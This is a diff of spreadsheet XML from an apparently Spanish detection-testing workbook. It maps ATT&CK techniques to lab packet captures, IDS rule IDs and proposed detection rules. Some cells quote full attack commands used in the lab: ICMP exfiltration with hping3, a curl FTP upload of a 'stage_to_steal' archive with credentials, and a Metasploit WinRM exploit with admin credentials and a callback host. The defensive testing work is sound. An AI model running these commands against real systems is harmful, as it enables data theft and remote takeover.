-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>598</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2010937,2010939,2010938</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2002911</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2010936,2010935,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2002910</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2100257,2100598,2009358,2024364,384,453,408,451,1421,1420,1418,257,598</t>
-    </r>
-  </si>
-  <si>
-    <t>2010937, 2002910, 2010935</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2010937,2010939,2010938,2002911,2010936,2010935,2002910,2100257,2100598</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2009358</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2100469,2100384,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2002752,2002749,2009582,2000538</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2100453,2100408,2100451,2010937,2001689,2010939,2010938,2002911,2100615,2010936,2010935,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2002910</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2101420,2101418,2100257,2100598,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2009358</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2024364,384,453,408,451,1421,1420,1418,257,598,36650,13586,50447</t>
-    </r>
-  </si>
-  <si>
-    <t>2100384, 2002752, 2100615, 2009582, 2100469, 2010935, 2100408, 2010937, 2002749, 2002910, 2002911</t>
-  </si>
-  <si>
-    <t>DDos + Escaneo de puertos</t>
-  </si>
-  <si>
-    <t>T1046-C2018-FIX.pcapng</t>
-  </si>
-  <si>
-    <t>2035480, 2025644</t>
-  </si>
-  <si>
-    <t>2002749, 2002752, 2035480, 20000419, 2025644</t>
-  </si>
-  <si>
-    <t>En determinadas circunstancias, si el envío de paquetes constituye una amenaza de denegación de servicio, podría detectarse el envío masivo de paquetes</t>
-  </si>
-  <si>
-    <t>Remote System Discovery</t>
-  </si>
-  <si>
-    <t>T1018</t>
-  </si>
-  <si>
-    <t>Descubrimiento de servicios y puertos</t>
-  </si>
-  <si>
-    <t>T1018.pcapng</t>
-  </si>
-  <si>
-    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911</t>
-  </si>
-  <si>
-    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911, 2002752, 2002749, 2101418, 2100615</t>
-  </si>
-  <si>
-    <t>2002752, 2100615, 2010935, 2010937, 2002749, 2002910</t>
-  </si>
-  <si>
-    <t>Regla que detecte envío de mútliples peticiones a un rango de puertos en un tiempo determinado</t>
-  </si>
-  <si>
-    <t>Group Policy Discovery</t>
-  </si>
-  <si>
-    <t>T1615</t>
-  </si>
-  <si>
-    <t>Comandos mediante Powershell para obtener información sobre configuraciones de políticas de grupo</t>
-  </si>
-  <si>
-    <t>T1615.pcapng</t>
-  </si>
-  <si>
-    <t>Detección por anomalías</t>
-  </si>
-  <si>
-    <t>Ejecución de comandos mediante Powershell para comprobar políticas de grupo</t>
-  </si>
-  <si>
-    <t>System Owner</t>
-  </si>
-  <si>
-    <t>T1033</t>
-  </si>
-  <si>
-    <t>Descubrimiento de sesión de usuario en equipo remoto</t>
-  </si>
-  <si>
-    <t>quser, qwinsta</t>
-  </si>
-  <si>
-    <t>T1033_system-owner.pcapng</t>
-  </si>
-  <si>
-    <t>44489, 2002752, 2002749, 2044666, 2051116</t>
-  </si>
-  <si>
-    <t>Regla que detecte múltiples interacciones con la API LSM_API_service del servicio RPC desde el mismo equipo origen.</t>
-  </si>
-  <si>
-    <t>Domain Trust Discovery</t>
-  </si>
-  <si>
-    <t>T1482</t>
-  </si>
-  <si>
-    <t>Descubrimiento de dominios de confianza en entorno Active Directory</t>
-  </si>
-  <si>
-    <t>dsquery</t>
-  </si>
-  <si>
-    <t>T1482_domain-trust-discovery.pcapng</t>
-  </si>
-  <si>
-    <t>Regla personalizada que detecte paquetes LDAP, procedentes de equipos que no son DC en la red (configurable manualmente) y con la cadena objectClass=trustedDomain</t>
-  </si>
-  <si>
-    <t>Exfiltration</t>
-  </si>
-  <si>
-    <t>Exfiltration Over Alternative Protocol</t>
-  </si>
-  <si>
-    <t>T1048</t>
-  </si>
-  <si>
-    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
-  </si>
-  <si>
-    <t>T1048.003</t>
-  </si>
-  <si>
-    <t>Exfiltración por ICMP</t>
-  </si>
-  <si>
-    <t xml:space="preserve">T1048.003-exfiltration_over_ICMP.pcapng </t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>29456</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,384,408</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>29456</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,384,408</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>31767,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>29456</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,384,408</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2100384,2002752,2002749,2100408,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>29456</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,384,408,31767</t>
-    </r>
-  </si>
-  <si>
-    <t>2100384, 2002752, 2002749, 2100408</t>
-  </si>
-  <si>
-    <t>Regla genérica que detecte PING inusual.</t>
-  </si>
-  <si>
-    <t>Exfiltracion mediante protocolo ICMP. Envia varios echo Request que contienen como datos el contenido de ese fichero. Comando: echo "Esto es un exfiltración sobre ICMP" &gt; file;timeout 15s hping3 --file ./file --data 36 192.168.2.2 --icmp</t>
-  </si>
-  <si>
-    <t>Exfiltration Over Other Network Medium</t>
-  </si>
-  <si>
-    <t>T1011</t>
-  </si>
-  <si>
-    <t>Exfiltration Over Bluetooth</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> T1011.001</t>
-  </si>
-  <si>
-    <t>Extracción via Bluetooth</t>
-  </si>
-  <si>
-    <t>Covenant, btobex, Bluetooth</t>
-  </si>
-  <si>
-    <t>T1011_exfiltration-over-bluetooth.pcapng</t>
-  </si>
-  <si>
-    <t>Detección por anomalías en red Bluetooth. Envío y/o recepción de información comprometida por la red Bluetooth</t>
-  </si>
-  <si>
-    <t>Automated Exfiltration</t>
-  </si>
-  <si>
-    <t>T1020</t>
-  </si>
-  <si>
-    <t>Traffic Duplication</t>
-  </si>
-  <si>
-    <t>T1020.001</t>
-  </si>
-  <si>
-    <t>Ejecución de script en Python para activar el reenvío de paquetes en el equipo víctima</t>
-  </si>
-  <si>
-    <t>SSH, Scapy</t>
-  </si>
-  <si>
-    <t>T1020.001_automated-exfiltration-traffic-duplication.pcapng</t>
-  </si>
-  <si>
-    <t>Detección por anomalías en red que detecte el envío duplicado de paquetes procedentes de un mismo origen interno a la organización</t>
-  </si>
-  <si>
-    <t>Scheduled Transfer</t>
-  </si>
-  <si>
-    <t>T1029</t>
-  </si>
-  <si>
-    <t>Comunicación C2 para el establecimiento de extracción programada</t>
-  </si>
-  <si>
-    <t>Covenant, Powershell</t>
-  </si>
-  <si>
-    <t>T1029_scheduled-transfer.pcapng</t>
-  </si>
-  <si>
-    <t>2027792, 2027793, 2002752, 2002749, 2101917</t>
-  </si>
-  <si>
-    <t>Detección por anomalías, basada en el descubrimiento de eventos programados que no han sido creados por el usuario.</t>
-  </si>
-  <si>
-    <t>Exfiltración por FTP</t>
-  </si>
-  <si>
-    <t>Caldera</t>
-  </si>
-  <si>
-    <t>T1048.003-exfiltration_over_FTP.pcapng</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2002752,2002749,2100472,2006409,2043217</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2003303,2003410</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,2015016,50447</t>
-    </r>
-  </si>
-  <si>
-    <t>Exfiltracion de datos utilizando el protocolo FTP. Utilizando caldera y la operacion Advanced Thief. Comando: curl -T stage_to_steal.tar.gz.gpg ftp://172.16.1.2/VictimDirectory/ --user "dit:dit"</t>
-  </si>
-  <si>
-    <t>Data Transfer Size Limits</t>
-  </si>
-  <si>
-    <t>T1030</t>
-  </si>
-  <si>
-    <t>Dividir archivos para realizar transferencias menores a un umbral que provoque alertas</t>
-  </si>
-  <si>
-    <t>ftp, split</t>
-  </si>
-  <si>
-    <t>T1030.pcapng</t>
-  </si>
-  <si>
-    <t>Dependiendo la forma en la que se envien los archivos, puede ser indetectable. Sin embargo, si utiliza protocolos de transferencia de ficheros (FTP,SMB...) resulta importante monitorizar transferencias con un mismo tamaño de manera concurrente</t>
-  </si>
-  <si>
-    <t>Transferencia de ficheros mediante FTP, previamente divididos en paquetes de un tamaño constante</t>
-  </si>
-  <si>
-    <t>Transfer Data to Cloud Account</t>
-  </si>
-  <si>
-    <t>T1537</t>
-  </si>
-  <si>
-    <t>Transferir archivos de una cuenta a otra mediante un servicio en la nube</t>
-  </si>
-  <si>
-    <t>OneDrive</t>
-  </si>
-  <si>
-    <t>T1537.pcapng</t>
-  </si>
-  <si>
-    <t>Deteccion por listas negras/anomalías</t>
-  </si>
-  <si>
-    <t>Transferir entre dos cuentas en la nube unos ficheros</t>
-  </si>
-  <si>
-    <t>Exfiltration Over C2 Channel</t>
-  </si>
-  <si>
-    <t>T1041</t>
-  </si>
-  <si>
-    <t>Exfiltración por canal C2</t>
-  </si>
-  <si>
-    <t>T1041.pcapng</t>
-  </si>
-  <si>
-    <t>2043217,2034567,2013028,2016992</t>
-  </si>
-  <si>
-    <t>50447, 2043217, 2034567, 2013028, 2016992</t>
-  </si>
-  <si>
-    <t>2002752, 2002749, 2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
-  </si>
-  <si>
-    <t>Detección por anomalías basada en la sospecha de una extracción de información confidencial por un posible canal C2</t>
-  </si>
-  <si>
-    <t>Exfiltration over Web Service</t>
-  </si>
-  <si>
-    <t>T1567</t>
-  </si>
-  <si>
-    <t>Exfiltration to Cloud Storage</t>
-  </si>
-  <si>
-    <t>T1567.002</t>
-  </si>
-  <si>
-    <t>Exfiltrar datos de un equipo a la nube</t>
-  </si>
-  <si>
-    <t>Google Drive</t>
-  </si>
-  <si>
-    <t>T1567.002.pcapng</t>
-  </si>
-  <si>
-    <t>Transferir ficheros de un equipo a la nube</t>
-  </si>
-  <si>
-    <t>Execution</t>
-  </si>
-  <si>
-    <t>User Execution</t>
-  </si>
-  <si>
-    <t>T1204</t>
-  </si>
-  <si>
-    <t>Malicious Link</t>
-  </si>
-  <si>
-    <t>T1204.001</t>
-  </si>
-  <si>
-    <t>Enlace malicioso</t>
-  </si>
-  <si>
-    <t>wget</t>
-  </si>
-  <si>
-    <t>T1204.001.pcapng</t>
-  </si>
-  <si>
-    <t>Redireccion al pinchar en un enlace a un sitio malicioso. Comando : wget http://172.16.1.2 (Desde la víctima)</t>
-  </si>
-  <si>
-    <t>Windows Management Instrumentation</t>
-  </si>
-  <si>
-    <t>T1047</t>
-  </si>
-  <si>
-    <t>Ejecución de carga por WinRM</t>
-  </si>
-  <si>
-    <t>T1047.pcapng</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>1394</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>, 20619</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2002752,2002749,</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>1394</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>,20619</t>
-    </r>
-  </si>
-  <si>
-    <t>Regla genérica que detecte intento de ejecucion de código shell en un equipo</t>
-  </si>
-  <si>
-    <t>Ejecucion de payload en un equipo mediante WinRM. Comando: msfconsole -x "use exploit/windows/winrm/winrm_script_exec; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; set LPORT 5555; set username administrator; set password vagrant; set force_vbs true; run -z; sessions -c 'cmdkey /list'; sessions -k 1; exit"</t>
-  </si>
-  <si>
-    <t>Exploitation for Client Execution</t>
-  </si>
-  <si>
-    <t>T1203</t>
-  </si>
-  <si>
-    <t>Ataque con Botnet</t>
-  </si>
-  <si>
-    <t>T1203-C2018.pcapng</t>
-  </si>
-  <si>
-    <t>System Services</t>
-  </si>
-  <si>
-    <t>T1569</t>
-  </si>
-  <si>
-    <t>Service Execution</t>
-  </si>
-  <si>
-    <t>T1569.002</t>
-  </si>
-  <si>
-    <t>Ejecución de un Servicio / Fichero Ejecutable de manera remota</t>
-  </si>
-  <si>
-    <t>PsExec</t>
-  </si>
-  <si>
-    <t>T1569_system-services-service-execution.pcapng</t>
-  </si>
-  <si>
-    <t>459, 2010781, 2025701, 2025699, 2027237</t>
-  </si>
-  <si>
-    <t>459, 2010781, 2025701, 2025699, 2027237, 44489, 30281, 26385</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t xml:space="preserve">459, 2010781, 2025701, 2025699, 2027237. 44489, 30281, 26385, 2101620, 2100459, </t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FFFF0000"/>
-        <sz val="11.0"/>
-      </rPr>
-      <t>2044666</t>
-    </r>
-    <r>
-      <rPr>
-        <rFont val="Arial, sans-serif"/>
-        <color rgb="FF000000"/>
-        <sz val="11.0"/>
-      </rPr>
       <t>, 2051116, 2024510, 2002752, 2002749, 2027191</t>
     </r>
-  </si>
-  <si>
-    <t>SÍ</t>
   </si>
   <si>
     <t xml:space="preserve">Existen múltiples métodos de detección. Como ejemplos:
@@ -5382,16 +5666,13 @@
     <xf borderId="17" fillId="7" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
       <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
     </xf>
-    <xf borderId="17" fillId="2" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
-      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
-    </xf>
-    <xf borderId="17" fillId="3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
-      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
-    </xf>
     <xf borderId="17" fillId="5" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
       <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
     </xf>
     <xf borderId="17" fillId="7" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
+      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
+    </xf>
+    <xf borderId="17" fillId="3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
       <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
     </xf>
     <xf borderId="17" fillId="4" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
@@ -5425,6 +5706,9 @@
       <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
     </xf>
     <xf borderId="13" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
+      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
+    </xf>
+    <xf borderId="17" fillId="2" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
       <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
     </xf>
     <xf borderId="17" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
@@ -6376,7 +6660,7 @@
       <c r="J6" s="44" t="s">
         <v>69</v>
       </c>
-      <c r="K6" s="54" t="s">
+      <c r="K6" s="45" t="s">
         <v>70</v>
       </c>
       <c r="L6" s="45">
@@ -6388,7 +6672,7 @@
       <c r="N6" s="46" t="s">
         <v>10</v>
       </c>
-      <c r="O6" s="55" t="s">
+      <c r="O6" s="47" t="s">
         <v>71</v>
       </c>
       <c r="P6" s="47">
@@ -6412,7 +6696,7 @@
       <c r="V6" s="46" t="s">
         <v>10</v>
       </c>
-      <c r="W6" s="56" t="s">
+      <c r="W6" s="54" t="s">
         <v>73</v>
       </c>
       <c r="X6" s="49">
@@ -6430,7 +6714,7 @@
       <c r="AB6" s="44" t="s">
         <v>65</v>
       </c>
-      <c r="AC6" s="57" t="s">
+      <c r="AC6" s="55" t="s">
         <v>75</v>
       </c>
       <c r="AD6" s="44" t="s">
@@ -6471,7 +6755,7 @@
       <c r="J7" s="44" t="s">
         <v>81</v>
       </c>
-      <c r="K7" s="54">
+      <c r="K7" s="45">
         <v>255.0</v>
       </c>
       <c r="L7" s="45">
@@ -6483,7 +6767,7 @@
       <c r="N7" s="46" t="s">
         <v>10</v>
       </c>
-      <c r="O7" s="55">
+      <c r="O7" s="56">
         <v>255.0</v>
       </c>
       <c r="P7" s="47">
@@ -6495,7 +6779,7 @@
       <c r="R7" s="46" t="s">
         <v>10</v>
       </c>
-      <c r="S7" s="58">
+      <c r="S7" s="57">
         <v>255.0</v>
       </c>
       <c r="T7" s="48">
@@ -6554,7 +6838,7 @@
       <c r="F8" s="43" t="s">
         <v>87</v>
       </c>
-      <c r="G8" s="59" t="s">
+      <c r="G8" s="58" t="s">
         <v>88</v>
       </c>
       <c r="H8" s="44" t="s">
@@ -6617,7 +6901,7 @@
       <c r="AA8" s="50" t="s">
         <v>57</v>
       </c>
-      <c r="AB8" s="60" t="s">
+      <c r="AB8" s="59" t="s">
         <v>94</v>
       </c>
       <c r="AC8" s="44" t="s">
@@ -6649,7 +6933,7 @@
       <c r="F9" s="43" t="s">
         <v>99</v>
       </c>
-      <c r="G9" s="59" t="s">
+      <c r="G9" s="58" t="s">
         <v>100</v>
       </c>
       <c r="H9" s="44" t="s">
@@ -6745,7 +7029,7 @@
       <c r="G10" s="43" t="s">
         <v>110</v>
       </c>
-      <c r="H10" s="61" t="s">
+      <c r="H10" s="60" t="s">
         <v>111</v>
       </c>
       <c r="I10" s="44" t="s">
@@ -6837,7 +7121,7 @@
       <c r="F11" s="43" t="s">
         <v>109</v>
       </c>
-      <c r="G11" s="59" t="s">
+      <c r="G11" s="58" t="s">
         <v>122</v>
       </c>
       <c r="H11" s="44" t="s">
@@ -6932,7 +7216,7 @@
       <c r="F12" s="43" t="s">
         <v>129</v>
       </c>
-      <c r="G12" s="59" t="s">
+      <c r="G12" s="58" t="s">
         <v>128</v>
       </c>
       <c r="H12" s="44" t="s">
@@ -7027,7 +7311,7 @@
       <c r="F13" s="43" t="s">
         <v>129</v>
       </c>
-      <c r="G13" s="59" t="s">
+      <c r="G13" s="58" t="s">
         <v>128</v>
       </c>
       <c r="H13" s="44" t="s">
@@ -7122,7 +7406,7 @@
       <c r="F14" s="43" t="s">
         <v>140</v>
       </c>
-      <c r="G14" s="59" t="s">
+      <c r="G14" s="58" t="s">
         <v>139</v>
       </c>
       <c r="H14" s="44" t="s">
@@ -7143,7 +7427,9 @@
       <c r="M14" s="45">
         <v>4718.0</v>
       </c>
-      <c r="N14" s="46"/>
+      <c r="N14" s="46" t="s">
+        <v>10</v>
+      </c>
       <c r="O14" s="47" t="s">
         <v>145</v>
       </c>
@@ -7153,7 +7439,9 @@
       <c r="Q14" s="47">
         <v>4986.0</v>
       </c>
-      <c r="R14" s="46"/>
+      <c r="R14" s="46" t="s">
+        <v>10</v>
+      </c>
       <c r="S14" s="48" t="s">
         <v>146</v>
       </c>
@@ -7163,7 +7451,9 @@
       <c r="U14" s="48">
         <v>10020.0</v>
       </c>
-      <c r="V14" s="46"/>
+      <c r="V14" s="46" t="s">
+        <v>10</v>
+      </c>
       <c r="W14" s="49" t="s">
         <v>147</v>
       </c>
@@ -7211,7 +7501,7 @@
       <c r="F15" s="43" t="s">
         <v>10</v>
       </c>
-      <c r="G15" s="59" t="s">
+      <c r="G15" s="58" t="s">
         <v>10</v>
       </c>
       <c r="H15" s="44" t="s">
@@ -7366,13 +7656,13 @@
       <c r="Z16" s="46" t="s">
         <v>74</v>
       </c>
-      <c r="AA16" s="62" t="s">
+      <c r="AA16" s="61" t="s">
         <v>53</v>
       </c>
-      <c r="AB16" s="63" t="s">
+      <c r="AB16" s="62" t="s">
         <v>170</v>
       </c>
-      <c r="AC16" s="63" t="s">
+      <c r="AC16" s="62" t="s">
         <v>171</v>
       </c>
       <c r="AD16" s="44" t="s">
@@ -7381,7 +7671,7 @@
       <c r="AE16" s="50" t="s">
         <v>53</v>
       </c>
-      <c r="AF16" s="64" t="s">
+      <c r="AF16" s="63" t="s">
         <v>57</v>
       </c>
     </row>
@@ -7461,13 +7751,13 @@
       <c r="Z17" s="46" t="s">
         <v>74</v>
       </c>
-      <c r="AA17" s="62" t="s">
+      <c r="AA17" s="61" t="s">
         <v>53</v>
       </c>
-      <c r="AB17" s="63" t="s">
+      <c r="AB17" s="62" t="s">
         <v>170</v>
       </c>
-      <c r="AC17" s="63" t="s">
+      <c r="AC17" s="62" t="s">
         <v>171</v>
       </c>
       <c r="AD17" s="44" t="s">
@@ -7476,7 +7766,7 @@
       <c r="AE17" s="50" t="s">
         <v>53</v>
       </c>
-      <c r="AF17" s="64" t="s">
+      <c r="AF17" s="63" t="s">
         <v>57</v>
       </c>
     </row>
@@ -7556,13 +7846,13 @@
       <c r="Z18" s="46">
         <v>2002749.0</v>
       </c>
-      <c r="AA18" s="62" t="s">
+      <c r="AA18" s="61" t="s">
         <v>179</v>
       </c>
-      <c r="AB18" s="63" t="s">
+      <c r="AB18" s="62" t="s">
         <v>180</v>
       </c>
-      <c r="AC18" s="63" t="s">
+      <c r="AC18" s="62" t="s">
         <v>10</v>
       </c>
       <c r="AD18" s="44" t="s">
@@ -7571,7 +7861,7 @@
       <c r="AE18" s="50" t="s">
         <v>53</v>
       </c>
-      <c r="AF18" s="64" t="s">
+      <c r="AF18" s="63" t="s">
         <v>57</v>
       </c>
     </row>
@@ -7651,22 +7941,22 @@
       <c r="Z19" s="46" t="s">
         <v>74</v>
       </c>
-      <c r="AA19" s="62" t="s">
+      <c r="AA19" s="61" t="s">
         <v>186</v>
       </c>
-      <c r="AB19" s="63" t="s">
+      <c r="AB19" s="62" t="s">
         <v>187</v>
       </c>
-      <c r="AC19" s="63" t="s">
+      <c r="AC19" s="62" t="s">
         <v>188</v>
       </c>
-      <c r="AD19" s="63" t="s">
+      <c r="AD19" s="62" t="s">
         <v>105</v>
       </c>
       <c r="AE19" s="50" t="s">
         <v>53</v>
       </c>
-      <c r="AF19" s="64" t="s">
+      <c r="AF19" s="63" t="s">
         <v>57</v>
       </c>
     </row>
@@ -7746,27 +8036,27 @@
       <c r="Z20" s="46" t="s">
         <v>74</v>
       </c>
-      <c r="AA20" s="62" t="s">
+      <c r="AA20" s="61" t="s">
         <v>186</v>
       </c>
-      <c r="AB20" s="63" t="s">
+      <c r="AB20" s="62" t="s">
         <v>187</v>
       </c>
-      <c r="AC20" s="63" t="s">
+      <c r="AC20" s="62" t="s">
         <v>191</v>
       </c>
-      <c r="AD20" s="63" t="s">
+      <c r="AD20" s="62" t="s">
         <v>105</v>
       </c>
       <c r="AE20" s="50" t="s">
         <v>53</v>
       </c>
-      <c r="AF20" s="64" t="s">
+      <c r="AF20" s="63" t="s">
         <v>57</v>
       </c>
     </row>
     <row r="21" ht="153.75" customHeight="1">
-      <c r="B21" s="65" t="s">
+      <c r="B21" s="64" t="s">
         <v>151</v>
       </c>
       <c r="C21" s="43" t="s">
@@ -7841,13 +8131,13 @@
       <c r="Z21" s="46" t="s">
         <v>10</v>
       </c>
-      <c r="AA21" s="62" t="s">
+      <c r="AA21" s="61" t="s">
         <v>57</v>
       </c>
-      <c r="AB21" s="63" t="s">
+      <c r="AB21" s="62" t="s">
         <v>197</v>
       </c>
-      <c r="AC21" s="63" t="s">
+      <c r="AC21" s="62" t="s">
         <v>198</v>
       </c>
       <c r="AD21" s="44" t="s">
@@ -7856,12 +8146,12 @@
       <c r="AE21" s="50" t="s">
         <v>53</v>
       </c>
-      <c r="AF21" s="64" t="s">
+      <c r="AF21" s="63" t="s">
         <v>57</v>
       </c>
     </row>
     <row r="22" ht="153.75" customHeight="1">
-      <c r="B22" s="65" t="s">
+      <c r="B22" s="64" t="s">
         <v>151</v>
       </c>
       <c r="C22" s="43" t="s">
@@ -7907,7 +8197,9 @@
       <c r="Q22" s="47">
         <v>3.0</v>
       </c>
-      <c r="R22" s="46"/>
+      <c r="R22" s="46" t="s">
+        <v>10</v>
+      </c>
       <c r="S22" s="48" t="s">
         <v>205</v>
       </c>
@@ -7917,7 +8209,9 @@
       <c r="U22" s="48">
         <v>7.0</v>
       </c>
-      <c r="V22" s="46"/>
+      <c r="V22" s="46" t="s">
+        <v>10</v>
+      </c>
       <c r="W22" s="49" t="s">
         <v>206</v>
       </c>
@@ -7927,14 +8221,16 @@
       <c r="Y22" s="49">
         <v>63.0</v>
       </c>
-      <c r="Z22" s="46"/>
